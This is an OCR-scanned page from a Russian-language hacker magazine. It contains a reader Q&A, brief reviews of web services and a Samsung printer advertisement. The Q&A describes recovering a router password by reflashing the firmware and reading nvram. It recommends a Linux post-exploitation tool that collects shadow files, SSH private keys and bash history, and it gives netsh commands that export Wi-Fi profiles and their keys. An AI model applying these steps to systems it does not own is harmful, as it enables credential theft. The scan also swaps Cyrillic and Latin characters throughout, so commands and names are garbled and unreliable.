админ. Существует ли какой-нибудь способ 
восстановить пасс, кроме как найти этого 
самого админа? 

Универсального способа нет, и более 
того — очень часто это невозможно. 
Однако все сильно зависит от роутера 
и прошивки, которая в нем используется. 
Например, для А51І5 ѴѴІ_-500дР пароль 
вытащить удалось, вчеммнепомог один пост 
на форуме МбООд.іпІю). Для этого, правда, 
пришлось скачать прошивку ОрепѴѴРТ (в ней 
по умолчанию включен Іеіпеі) и загрузить 
через механизм безопасного обновления 
Лгтѵѵаге (необходимо отключить питание 
роутера, зажать кнопку «гезеі зеШпдз» 
и включить роутер, после чего тот получает 
адрес 192.168.1.1 и позволяет залить прошивку 
через Кр). Весь секрет в том, что даже после 
перезагрузки предыдущие настройки 
остаются в пѵгат. Получается, что можно 
залить новую прошивку, зайти с логи ном - 
паролем по умолчанию и посмотреть предыду- 
щие настройки простой командой «пѵгат 
зЬоѵѵ». Но, опять же, это лишь один конкрет- 
ный случай. 




□ 




ѴѴеіпге очень похож на РігеВид и ѴѴеЬ Іпзресіог, но предназначен для удаленной отладки 



□ Подскажи: как максимально быстро 
можно собрать информацию о І_іпих- 
системе, к которой был получен доступ. 

□ Инструментов для постэксплуатации 
І_іпих-систем довольно много, в том 
числе и в публичном доступе. 

Правда, надо иметь в виду, что подобные 
утилиты могут сливать полученную инфор- 
мацию «налево». Из функциональных тулз 
можно выделить Іпіегзесі, полностью напи- 
санную на РуіЬоп. Ничего сверхъестествен- 
ного она не делает, но упрощает массу задач, 
которые пришлось бы выполнять вручную. 
Утилита соберет файлы с паролями (раззѵѵб, 
зЬабоѵѵ, дзЬабоѵѵ, тазіег.раззѵѵсі), скопирует 
55Н-КЛЮЧИ (открытые и секретные), со- 
берет информацию о запущенных процессах 
и установленных приложениях, вытащит 
историю ВазЬ и задачи планировщика, 
просканирует внутреннюю сеть на «живые» 
хосты, попробует определить установленные 
в системе антивирусы и файрволы. Это лишь 
малая часть функционала. 

□ Как вытащить ключи для безопасной 
беспроводной сети, сохраненные 
в ѴѴіпсІоѵѵз-системе? 



□ Как вариант можно воспользоваться 
утилитой вроде ѴѴігеІеззКеуѴіеѵѵ 
(пігзоЙ.пеі/иІіІз/ѵѵігеІе55_кеу.ЫтІ), которая 
без труда извлечет их из системы и расшиф- 
рует. Но есть способ обойтись и без сторон- 
них инструментов. Подсистема ѴѴіпбоѵѵз 
ѴѴігеІезз 2его СопПдигаІіоп (та, которая 
отвечаетза беспроводные подключения) 
хранит настройки подключения в профилях. 
Их список можно получить, набрав команду: 



пе1:5Іі ыіап з Иом ргобіез 

Любой профиль можно экспортировать, 
чем мы и воспользуемся: 



пеІіБІі щіап ехрогі: ргобіе пате="<имя 
профайла>" 

В результате будет создан ХМІ_-файл, 
где будут сохранены настройки для 
конкретного соединения, включая ключ 
(правда, в зашифрованном виде). Что 
с этим делать? Во-первых, профайл можно 
импортировать в другой системе и таким 
образом получить готовые настройки для 
подключения к сети! 



пеі: з М міап асісі ргобіе б1епате="<имя 
файла с профайлом. хті" 

Но это еще не все. Если после импорта 
профайла открыть настройки подключения 
и перейти на вкладку «Безопасность», то 
ты увидишь поле для ввода ключа, запол- 
ненное звездочками. И теперь, внимание, 
магия! Рядом же есть галочка, позволяющая 
отобразить все символы ключа :).□□ 
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ІЖІТ5/ѴѴѴѴѴѴ2 



ѴѴѴѴѴѴ2 




ѴОХ.ІО 



ѴОХ.ІО 

Похоже, что поиски достойной альтернативы Экуре'у, которая не требовала бы уста- 
новки десктопного клиента, успешно завершились. Ѵох.іо работает через браузер и 
позволяет бесплатно осуществлять видео- и голосовые звонки другим пользователям 
сервиса, устраивать конференции с несколькими участниками и по вполне приемле- 
мым ценам звонить на городские и мобильные телефоны. Чтобы позвонить на твой ѵох. 
іо-аккаунт не обязательно даже регистрироваться, — ты можешь расшарить специ- 
альную ссылку, открыв которую, люди получат возможность быстро набрать твой 
виртуальный номер. Кроме того, создатели сервиса активно занимаются разработкой 
мобильных приложений для разных платформ, но пока релиз доступен только для І05. 



Бкуревбраузере 




ХМАРК5 



хтагкз.сот 

Полезность этого сервиса для тебя определяется простым критерием: используешь 
ли ты закладки? Хітіагкз умееттолько одно — синхронизировать букмарки между ком- 
пьютерами и разными браузерами (Рігеіюх, СЬготе, Іпіегпеі Ехріогег и Баіюгі), правда 
для этого придется установить специальные расширения. Если заплатить неболь- 
шую денежку (12$ в год), то можно синхронизировать закладки еще и с мобильными 
устройствами. Тут стоит отметить, что инструменты реализованы очень качественно: 
сразу чувствуется опыт разработчиков, в портфеле которых есть такой замечательный 
сервис как менеджер паролей БазіРазз. 



Грамотная синхронизация закладок 




ЮА05.ІЫ 



Іоасіз.іп 

Скорость работы сайта для пользователей из разных стран напрямую зависит от 
географического расположения дата-центра, где находится хостинг. Чем дальше фи- 
зически находится сервер, тем больше будет задержка при открытии сайта. Она может 
быть и несущественной, но все равно чувствуется. Сервис Іоасіз.іп позволяет прове- 
рить скорость загрузки произвольного ресурса из самых разных точек мира. Причем 
инструмент помимо сетевой задержки учитывает еще и время рендеринга страницы 
браузером: можно сравнить замеры для Рігеіюх, СЬготе, Эа^агі, Іпіегпеі Ехріогег. Ктому 
же есть возможность посмотреть, как выглядел загружаемый сайт в каждый момент 
загрузки - в виде последовательности скриншотов. 



Бенчмарк для замера производительности сайта 



0ІА6РАМІ.Ѵ 



Ріадгат.Іѵ 

Этот сервис будет далеко не первым среди онлайн-инструментов для создания раз- 
личных диаграмм и схем, но что его отличает от многих других — такэто максимальная 
схожесть с известным МісгозоЙ Ѵізіо. Это почти полная копия. Порой даже забываешь, 
что имеешь дело не с обычной программой, а с онлайн -сер висом — настолько здоро- 
во реализован интерфейс. Ріадгатіу — настоящий пгшзі Ьаѵе на случай, если нужно 
создать схему или иллюстрацию для курсовой или дипломной работы, статьи в журнале 
или поста в блоге. Блок-схемы, диаграммы баз данных, схемы локальных сетей, схемы 
электрических цепей — всего в базе Ріадгатіу более 70 категорий элементов. 

Редакторсхем и диаграмм 
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Мобильная печать? Проще простого! 




Управляйте беспроводной печатью 
с различных мобильных устройств: 

планшетов, смартфонов, медиаплееров и ноутбуков 

Технология мобильной печати Затзипд делает печать с мобильного устройства 
еще проще и быстрее! Печатайте документы, веб-страницы, фотографии и все, 
что захотите! 



Не сложнее, 
чем нажать 




1 В категории «Бытовая электроника. За инновации в сервисе», 2 для достижения наилучшего качества печати используйте 
только оригинальные картриджи §аш$ипд. МоЬіІеРгіпІ - мобильная печать, Ргіпі - печать, Ргеѵіеш - предварительный 
просмотр. Функция мобильной печати доступна на принтерах Зашвипд МІ.-2165ѴѴ/2168ѴѴ и МФУ 8СХ-3405Ы//3405РМ/. 

Единая служба поддержки: 8-800-555-55-55 (звонок по России бесплатный), ѵѵѵѵѵѵ. затзипд. сот 



Мобильная печать на раз, Зва, три! 




& 

Кеер II КеаР 




Права 

потребителей 1 

и качество обслуживания 



Товар сертифицирован. Реклама. 



Узнайте больше о новинке в фирменном магазине Затзипд 

Москва, ул. Тверская, д. 22 






